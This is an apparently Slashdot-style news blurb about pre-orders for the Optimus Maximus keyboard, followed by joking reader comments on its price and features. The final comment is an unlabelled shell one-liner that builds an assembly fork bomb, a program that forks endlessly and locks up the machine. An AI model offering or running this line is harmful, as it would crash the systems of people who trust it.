Optimus Keyboard Pre-Orders In Mere Hours
godzillopiteco sends timely word that Art. Lebedev Studio is finally going to accept pre-orders for the Optimus Maximus Keyboard — in just under 11 hours at the time this story posts, according to the countdown timer on the site. (Late last year we were primed to pre-order in December 2006.) Read the project's blog for some recent developments.
oops... I take that back... sorry... didn't see the price tag... maybe later.
At that price, I'd expect to get the Optimus *Prime* keyboard, and it better transform into the leader of the Autobots, too!
Chris Mattern
Well, you can afford to buy http://www.artlebedev.com/everything/vilcus/ :)
I'm so pleased about this advance warning, giving me a chance to cogitate on the early stages of beginning to anticipate the eventual opening moments of the new dawn of an opportunity to gear up for a period when, soon, there will be a new, imminent development foreshadowing the approaching onset of the start of my chance to, on a first-come, first-served basis, pre-order this thing.
Don't disappoint your bird dog. Go to the range.
an "any key"???
I don't care if it comes with a "summon the slave girls to come orally satisfy me" button -- if it ain't ergo, it ain't worth it
It doesn't, but you could program it to have one.
Slave girls not included. Slavery maybe illegal in your country
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;